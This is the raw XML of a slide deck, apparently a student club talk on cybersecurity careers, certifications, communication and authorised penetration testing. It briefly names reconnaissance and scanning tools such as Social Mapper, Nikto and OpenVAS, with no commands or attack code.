              <a:t>. 3 challenges, 6 hours long each. Similar to the OSCP.</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438870690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38870690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Generally, security jobs like to see certs.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generally, development jobs like to see experience / project work / stackoverflow contributions / github. Dgaf about certs.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Cybersecurity is a weird field. A lot of people go along the cert route. Depending on the industry, you can easily find success without them. However, not the case for some. Need Sec+ / CEH for pen testing navy submarines with LCE as a contractor. The life of a contractor may be a little more cert heavy. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. Can get hired on as long as you promise the company you’ll get the cert in anywhere between 2-6 months. Security+ / CISSP / something else. MC exam certs that are a mild wide and an inch deep. No practical, hands-on testing.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Doing work with a private company you’ve been with for years? You’re fine. They may get you them… it really depends (lol the answer to everything)</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43a3b4af2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43a3b4af2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Multiple sec engis / architects in one company.</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Big ass company that uses a LOT of products? You have people that dedicated that learning the ins and outs of that product to protect the org. (story about FoxT BoKS, FireEye, CyberArk)</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They make the security infrastructure. They ALL work together. Teamwork is extremely important! And comms! NEED MORE COMMS</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Gather your data. Put it in a database / data warehouse. Test to see how well you’re doing. Are these products working? Comm that to the business. Similar to the pen testing example. Comm that to your business to make sure they understand what this is doing for them so they see value for paying for this service. OR, on the other hand, let it be known to the business units that this product isn’t working out, and suggest a new product or use open source software</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>It could evolve into more of a business-focused, people skill profession. But project managers and senior pen testers have an AWESOME mix of technical and people skills</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>I can only see nothing but good about my manager at TIAA. Has GREAT people skills. GODLIKE SQL DEVELOPER. “How do you know to do that join?” “I just know 4Head”</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 honestly just become the CISO in 20 years 4Head</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="160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3a3b4af2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3a3b4af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key to success in this field. Just like reporting in penetration testing. That executive summary is the MOST IMPORTANT as well as the technical findings.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Jake is gonna tell you which doors / windows he was able to get into after he tests your home security system. He tells them in an easy-to-understand manner. “Yeah, there’s a backdoor lol u should fix that dude”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Always need more comms. Tell your business officers / client what you found or you lose! D:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Key to success right there Pog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39a5bf0b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39a5bf0b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Graduate students are more valuable to a company because they KNOW how to do research on solve problems… that’s pretty much what you do in grad school, even if you want to go into industry. They’re not reliant on other people to hold their hand. However, they ALWAYS ask for help when they absolutely need it. There’s never any shame in doing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Passion for anything that you get into is important. Like this club! Attend these meetings, our practices, learn new things about this field, attend conferences, compete in CTFs, meet new people, NETWORK with people! Networking is valuable in any field. It’s not about what you know… it’s about whom you know.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Learn from your experience. Classes help with the background knowledge / theory. I learn by doing. Do you know how you learn?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43a3b4af2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43a3b4af2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Closing Remarks. Thank you so much for listening. I hope this talk has inspired at least some of you to take the next steps into pursuing a career in this field. It is ever changing. New, hot technology come out all the time (Tableau example - everyone wants to learn it). Lifelong learning in this field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3a5a05f5f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a5a05f5f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3a5a05f5f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a5a05f5f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3a5a05f5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a5a05f5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36e8366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36e8366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Hacking with permission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36e83666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36e83666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Manual entry into STIGs or using tools to automate it. For many types of technology, not just OSs. Also STIGs for applications. Pen testing is another way of checking for compliance within the government’s framework (RMF).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381bebc1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381bebc1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38870690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38870690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Man’s got some really wide eyes -i blame spencer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It’s 4 am. Jake is in you house. He has a riptire</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>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Introducing Jake, the professional burglar</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You just bought a new home security system and you want Jake to test it by trying to break into your house - testing all the doors, windows, etc.</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Specifications - first / second / third base? Or a home run? Depends on the industry. They may only want second base</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“ok we good now pls leave me alone im scared now your job is done and here’s your compensation”</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“do we want you test this door but not that door?”</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“find our stuff, but don’t </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>actually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> look at it. we’re scared; just show us that you found it”</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="4572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How to get </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" u="sng">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>the juice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> on a larger level:</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Check all the front doors in the neighborhood, town, city (specifications of the burglary job)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Black box vs. white box - will they tell you about their houses’ layouts beforehand (system layout)? Or will they simply give you an address (just the company name)?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Make a report - which doors are open?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="16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381bebc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381bebc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36e8366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36e8366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38674d7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38674d7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Virtualization is cool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rgbClr val="434343"/>
        </a:solid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Verdana"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>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rgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600">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8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>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43434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Verdana"/>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdan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EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="9144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2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="13716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3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="18288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4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="22860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5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="27432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6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="32004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7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Verdana"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdan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27.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId6"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6.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35.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId6"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2.png"/><Relationship Id="rId9"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4.png"/><Relationship Id="rId8"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0.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overthewire.org/wargames/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/#" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackthebox.eu/" TargetMode="External"/><Relationship Id="rId6"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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId5"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lynda.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://information.rapid7.com/what-is-penetration-testing-whitepaper-reg.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackthebox.eu/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnhub.com/#" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nymag.com/thejob/2017/03/penetration-tester-cybersecurity-interview.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosecuritygeek.com/my-oscp-journey/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SpiderLabs/social_mapper" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://overthewire.org/wargam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iase.disa.mil/stigs/Pages/index.aspx"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offensive-security.com/"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2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="9">
            <a:off x="3063712" y="101003"/>
            <a:ext cx="2543824" cy="1904445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="Google Shape;117;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3678850" y="2879122"/>
            <a:ext cx="1786307" cy="1361915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="116" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4335624" y="2005448"/>
            <a:ext cx="28800" cy="1067700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector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Information Gathering - Social Mapper</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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Open Source Intelligence (OSINT) Python-based tool that uses facial recognition to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> social media profiles across different sites</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Variety of different inputs (CSV file, image folder, company’s name)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Variety of different outputs (CSV file, image, SM “resume”)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Would be used to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>engagement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> targets’ social media presences</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>WAY faster than manual effort</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>8 different social media platforms</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Could load results into:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Maltego, GoPhish, LUCY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125" name="Google Shape;125;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796000" y="2892775"/>
            <a:ext cx="3036300" cy="20526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57425" y="-47575"/>
            <a:ext cx="4270800" cy="338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...although, there can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t> sometimes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>be false positives</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Google Shape;131;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3735175" y="428288"/>
            <a:ext cx="2182700" cy="4286925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="132" name="Google Shape;132;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5917875" y="630550"/>
            <a:ext cx="2904000" cy="2904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1388100" y="526350"/>
            <a:ext cx="63678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200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMO TIME!</a:t>
            </a:r>
            <a:endParaRPr sz="7200">
              <a:solidFill>
                <a:srgbClr val="6AA84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Vulnerability Analysis - Nikto</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;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EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - web server vulnerability scanner</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shows what version of the web server / operating system the target is using</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Indicates if it is out of date or not</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="EFEFEF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lists known vulnerabilities from the Open Source Vulnerability Database (OSVDB)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Google Shape;144;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173525" y="2911601"/>
            <a:ext cx="2796950" cy="1398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Vulnerability Analysis - OpenVAS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
